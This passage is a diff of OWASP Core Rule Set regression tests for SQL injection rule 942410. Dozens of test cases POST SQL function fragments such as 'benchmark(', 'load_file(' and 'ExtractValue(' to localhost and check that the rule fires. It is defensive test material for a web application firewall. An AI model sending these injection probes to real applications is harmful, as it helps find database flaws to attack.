- stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=VALUES%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-114 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=version%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-115 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=version%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-116 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=xmltype%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-117 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=XMLType%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-118 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=year%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" + - test_id: 1 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "ABS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 2 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "benchmark(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 3 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENChmARk(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 4 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cast(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 5 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CAST(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 6 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "char(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 7 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "chaR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 8 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "chr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 9 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CHR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 10 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COALESCE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 11 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "Compress (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 12 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "concat (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 13 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cOnCaT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 14 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "concat_ws(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 15 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "convert(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 16 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "cOnVeRt(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 17 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 18 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "COUNT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 19 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "CURRENT_USER(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 20 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "database (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 21 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "date(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 22 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=date%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 23 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=day.+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 24 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=day%26%27%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 25 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 26 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=default%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 27 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 28 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 29 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 30 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=EXTRACTVALUE%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 31 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=floor%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 32 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=FLOOR+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 33 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=format%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 34 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=GROUP_CONCAT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 35 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=hex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 36 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=hEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 37 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if+%21%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 38 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 39 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 40 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=if%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 41 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IFNULL%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 42 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=in+%27%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 43 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IN+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 44 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=IN%2F%2A%2A%2F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 45 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 46 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 47 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 48 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 49 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 50 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 51 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%26%26%21%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 52 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=length%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 53 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=LENGTH%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 54 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ln+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 55 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 56 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 57 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=local%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 58 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=log%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 59 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=log%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 60 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=lower%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 61 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MAKE_SET%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 62 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MAX%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 63 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=md5%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 64 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=md5%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 65 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=MID%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 66 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=minute+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 67 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=month%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 68 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "name_const(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 69 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "now(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 70 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "nOW(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_id: 71 + desc: "SQL Injection Attack" + stages: + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 